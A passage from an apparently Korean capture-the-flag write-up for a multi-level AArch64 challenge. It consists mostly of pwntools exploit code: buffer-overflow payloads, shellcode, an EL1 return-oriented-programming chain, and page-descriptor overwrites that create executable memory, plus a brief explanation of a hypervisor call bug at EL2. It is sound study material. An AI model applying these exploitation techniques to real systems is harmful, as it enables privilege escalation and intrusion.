style="color:#f92672">.</span>send(tail_input) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">el1_arbitrary_code_execute</span>(assembly: str) <span style="color:#f92672">-&gt;</span> <span style="color:#66d9ef">None</span>: </span></span><span style="display:flex;"><span> NEW_MAP_ADDR <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x7FFEFFFFB000</span> </span></span><span style="display:flex;"><span> DESCRIPTOR_TABLE_ADDR_OF_NEW_MAP <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xFFFFFFFFC0028FD8</span> </span></span><span style="display:flex;"><span> chain <span style="color:#f92672">=</span> [<span style="color:#ae81ff">0</span>, NEW_MAP_ADDR] </span></span><span style="display:flex;"><span> el1_return_oriented_programming( </span></span><span style="display:flex;"><span> rop_chain<span style="color:#f92672">=</span>chain, </span></span><span style="display:flex;"><span> el0_head_assembly<span style="color:#f92672">=</span><span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;&#34;&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x0, #0;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x1, =</span><span style="color:#e6db74">{</span>hex(<span style="color:#ae81ff">0x1000</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x2, #3;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x3, xzr;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x4, xzr;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x5, #0xFFFFFFFFFFFFFFFF;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x6, =</span><span style="color:#e6db74">{</span>el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#39;mmap&#39;</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> blr x6;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x20, x0;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x6, =</span><span style="color:#e6db74">{</span>el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#39;gets&#39;</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> blr x6;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x0, x20;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x1, =</span><span style="color:#e6db74">{</span>hex(<span style="color:#ae81ff">0x1000</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x2, #5;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x6, =</span><span style="color:#e6db74">{</span>el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#39;mprotect&#39;</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> blr x6;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x0, 0;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x1, =</span><span style="color:#e6db74">{</span>hex(DESCRIPTOR_TABLE_ADDR_OF_NEW_MAP<span style="color:#f92672">+</span><span style="color:#ae81ff">6</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x2, 1;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x5, =</span><span style="color:#e6db74">{</span>el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#39;read&#39;</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> blr x5;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> add x22, x22, 1;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> cmp x22, x23;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> b.lt read_rop_chain </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;&#34;&#34;</span>, <span style="color:#75715e"># this mmap allocate NEW_MAP_ADDR(0x7ffeffffb000)-0x36000</span> </span></span><span style="display:flex;"><span> head_input<span style="color:#f92672">=</span>make_shellcode(assembly) <span style="color:#f92672">+</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">+</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x00</span><span style="color:#e6db74">&#34;</span>, </span></span><span style="display:flex;"><span> ) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>p <span style="color:#f92672">=</span> remote(<span style="color:#e6db74">&#34;localhost&#34;</span>, <span style="color:#ae81ff">6666</span>) </span></span><span style="display:flex;"><span><span style="color:#75715e"># p = process(&#34;../share/run.sh&#34;)</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># p = process(&#34;../share/run_debug.sh&#34;)</span> </span></span><span style="display:flex;"><span>el0_elf <span style="color:#f92672">=</span> ELF(<span style="color:#e6db74">&#34;./el0&#34;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>EL1_PRINT_FLAG <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xFFFFFFFFC0008408</span> </span></span><span style="display:flex;"><span>EL1_EXIT <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xFFFFFFFFC00091A4</span> </span></span><span style="display:flex;"><span>el1_arbitrary_code_execute( </span></span><span style="display:flex;"><span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;&#34;&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x2, =</span><span style="color:#e6db74">{</span>hex(EL1_PRINT_FLAG)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> blr x2;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x2, =</span><span style="color:#e6db74">{</span>hex(EL1_EXIT)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> blr x2;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;&#34;&#34;</span> </span></span><span style="display:flex;"><span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>p<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;Flag (EL1): &#34;</span>) </span></span><span style="display:flex;"><span>FLAG <span style="color:#f92672">=</span> p<span style="color:#f92672">.</span>recvline()[:<span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>] </span></span><span style="display:flex;"><span>print(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;Flag: </span><span style="color:#e6db74">{</span>FLAG<span style="color:#f92672">.</span>decode()<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>) </span></span></code></pre></div><h3 id="nsel2">NS.EL2</h3> <p>EL2 부터는 플래그를 출력해주는 함수가 없으므로 Arbitrary Code Execute 만을 서술한다.<br> EL2 의 취약점은 hvc 에서 IPA 의 Page Descriptor 설정하는데 존재한다. descriptor 를 설정할 때 ipa 의 범위는 검증하지만, descriptor 의 범위는 검증하지 않는다. 그리고 ipa 의 하위 바이트를 검증하지 않으므로 RWX 영역을 만들 수 있다.</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">from</span> pwn <span style="color:#f92672">import</span> <span style="color:#f92672">*</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># context.log_level = &#34;debug&#34;</span> </span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>arch <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;aarch64&#34;</span> </span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>bits <span style="color:#f92672">=</span> <span style="color:#ae81ff">64</span> </span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>endian <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;little&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>DUMMY_VALUE <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xDEAD_BEEF_CAFE_BEBE</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>EL0_STACK_LOW <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x7FFF_7FFF_E000</span> </span></span><span style="display:flex;"><span>EL0_SFP_IN_RUN <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x7FFF_7FFF_FFA0</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>EL0_BUF <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x7FFE_FFFF_D000</span> </span></span><span style="display:flex;"><span>EL0_WSM <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x7FFE_FFFF_E000</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>EL0_LDP_X29_X30_SP_RET <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x0040_00FC</span> </span></span><span style="display:flex;"><span>EL0_LDR_X19_LDP_X29_X30_SP_RET <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x0040_0294</span> </span></span><span style="display:flex;"><span>EL0_RET <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x0040_0100</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">make_shellcode</span>(assembly: str) <span style="color:#f92672">-&gt;</span> bytes: </span></span><span style="display:flex;"><span> shellcode <span style="color:#f92672">=</span> asm(assembly) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">assert</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> shellcode </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> shellcode </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">load_key</span>(idx: int): </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;cmd&gt; &#34;</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;0&#34;</span>) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;index: &#34;</span>, str(idx)<span style="color:#f92672">.</span>encode()) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">save_key</span>(idx: int, key: bytes): </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;cmd&gt; &#34;</span>, <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;1&#34;</span>) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;index: &#34;</span>, str(idx)<span style="color:#f92672">.</span>encode()) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendlineafter(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;key: &#34;</span>, key) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">el0_arbitrary_code_execute</span>(assembly: str) <span style="color:#f92672">-&gt;</span> <span style="color:#66d9ef">None</span>: </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;a&#34;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x100</span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;gets&#34;</span>]) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;gets&#34;</span>]) </span></span><span style="display:flex;"><span> save_key(<span style="color:#ae81ff">1</span>, pl) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;a&#34;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x120</span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> make_shellcode(assembly) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">assert</span> len(pl) <span style="color:#f92672">&lt;=</span> <span style="color:#ae81ff">0x1000</span> </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendline(pl) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;a&#34;</span> <span style="color:#f92672">*</span> (<span style="color:#ae81ff">1</span> <span style="color:#f92672">+</span> <span style="color:#ae81ff">4</span>) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x00</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">*</span> (<span style="color:#ae81ff">0x100</span> <span style="color:#f92672">-</span> len(pl)) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;main&#34;</span>] <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x44</span>) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;mprotect&#34;</span>]) </span></span><span style="display:flex;"><span> save_key(<span style="color:#ae81ff">0x1000</span>, pl) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> load_key(<span style="color:#ae81ff">1</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;a&#34;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">0x100</span> </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(EL0_RET) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#34;gets&#34;</span>]) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(DUMMY_VALUE) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(EL0_SFP_IN_RUN <span style="color:#f92672">-</span> <span style="color:#ae81ff">0x30</span>) </span></span><span style="display:flex;"><span> save_key(<span style="color:#ae81ff">1</span>, pl) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">=</span> p64(EL0_STACK_LOW <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x100</span>) </span></span><span style="display:flex;"><span> pl <span style="color:#f92672">+=</span> p64(EL0_BUF <span style="color:#f92672">+</span> <span style="color:#ae81ff">0x120</span>) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>sendline(pl) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">el1_return_oriented_programming</span>( </span></span><span style="display:flex;"><span> rop_chain: list[int], </span></span><span style="display:flex;"><span> el0_head_assembly: str <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;</span>, </span></span><span style="display:flex;"><span> head_input: bytes <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;&#34;</span>, </span></span><span style="display:flex;"><span> el0_tail_assembly: str <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;</span>, </span></span><span style="display:flex;"><span> tail_input: bytes <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;&#34;</span>, </span></span><span style="display:flex;"><span>) <span style="color:#f92672">-&gt;</span> <span style="color:#66d9ef">None</span>: </span></span><span style="display:flex;"><span> ROP_CHAIN_ADDR <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xFFFFFFFFC0019C00</span> </span></span><span style="display:flex;"><span> EL1_SYSCALL_HANDLER_RET_ADDR <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xFFFFFFFFC0019BB8</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> rop_chain <span style="color:#f92672">=</span> rop_chain[:<span style="color:#ae81ff">2</span>] <span style="color:#f92672">+</span> [<span style="color:#ae81ff">0</span>] <span style="color:#f92672">*</span> <span style="color:#ae81ff">2</span> <span style="color:#f92672">+</span> rop_chain[<span style="color:#ae81ff">2</span>:] </span></span><span style="display:flex;"><span> rop_chain <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;&#34;</span><span style="color:#f92672">.</span>join([p64(gadget) <span style="color:#66d9ef">for</span> gadget <span style="color:#f92672">in</span> rop_chain]) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">assert</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">not</span> <span style="color:#f92672">in</span> rop_chain <span style="color:#f92672">and</span> len(rop_chain) <span style="color:#f92672">&lt;=</span> <span style="color:#ae81ff">0x420</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> el0_arbitrary_code_execute( </span></span><span style="display:flex;"><span> el0_head_assembly </span></span><span style="display:flex;"><span> <span style="color:#f92672">+</span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;&#34;&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x22, xzr;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x23, =</span><span style="color:#e6db74">{</span>len(rop_chain)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x24, =</span><span style="color:#e6db74">{</span>ROP_CHAIN_ADDR<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> read_rop_chain: </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x0, 0;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> add x1, x24, x22;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x2, 1;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x5, =</span><span style="color:#e6db74">{</span>el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#39;read&#39;</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> blr x5;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> add x22, x22, 1;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> cmp x22, x23;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> b.lt read_rop_chain </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x0, 0;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x1, =</span><span style="color:#e6db74">{</span>hex(EL1_SYSCALL_HANDLER_RET_ADDR<span style="color:#f92672">+</span><span style="color:#ae81ff">1</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x2, 1;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x5, =</span><span style="color:#e6db74">{</span>el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#39;read&#39;</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> blr x5;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> &#34;&#34;&#34;</span> </span></span><span style="display:flex;"><span> <span style="color:#f92672">+</span> el0_tail_assembly </span></span><span style="display:flex;"><span> ) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>send(head_input) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>send(rop_chain) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>send(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x94</span><span style="color:#e6db74">&#34;</span>) </span></span><span style="display:flex;"><span> p<span style="color:#f92672">.</span>send(tail_input) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">el1_arbitrary_code_execute</span>(assembly: str) <span style="color:#f92672">-&gt;</span> <span style="color:#66d9ef">None</span>: </span></span><span style="display:flex;"><span> NEW_PAGE_ADDR <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x7FFEFFFFB000</span> </span></span><span style="display:flex;"><span> DESCRIPTOR_TABLE_ADDR_OF_NEW_PAGE <span style="color:#f92672">=</span> <span style="color:#ae81ff">0xFFFFFFFFC0028FD8</span> </span></span><span style="display:flex;"><span> chain <span style="color:#f92672">=</span> [<span style="color:#ae81ff">0</span>, NEW_PAGE_ADDR] </span></span><span style="display:flex;"><span> el1_return_oriented_programming( </span></span><span style="display:flex;"><span> rop_chain<span style="color:#f92672">=</span>chain, </span></span><span style="display:flex;"><span> el0_head_assembly<span style="color:#f92672">=</span><span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;&#34;&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x0, #0;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x1, 0x01000;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x2, #3;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x3, xzr;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x4, xzr;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x5, #0xFFFFFFFFFFFFFFFF;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x6, =</span><span style="color:#e6db74">{</span>el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#39;mmap&#39;</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> blr x6;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x20, x0;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x6, =</span><span style="color:#e6db74">{</span>el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#39;gets&#39;</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> blr x6;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x0, x20;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x1, 0x01000;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x2, #5;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x6, =</span><span style="color:#e6db74">{</span>el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#39;mprotect&#39;</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> blr x6;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x0, 0;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x1, =</span><span style="color:#e6db74">{</span>hex(DESCRIPTOR_TABLE_ADDR_OF_NEW_PAGE<span style="color:#f92672">+</span><span style="color:#ae81ff">6</span>)<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> mov x2, 1;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ldr x5, =</span><span style="color:#e6db74">{</span>el0_elf<span style="color:#f92672">.</span>symbols[<span style="color:#e6db74">&#39;read&#39;</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> blr x5;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74"> </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> 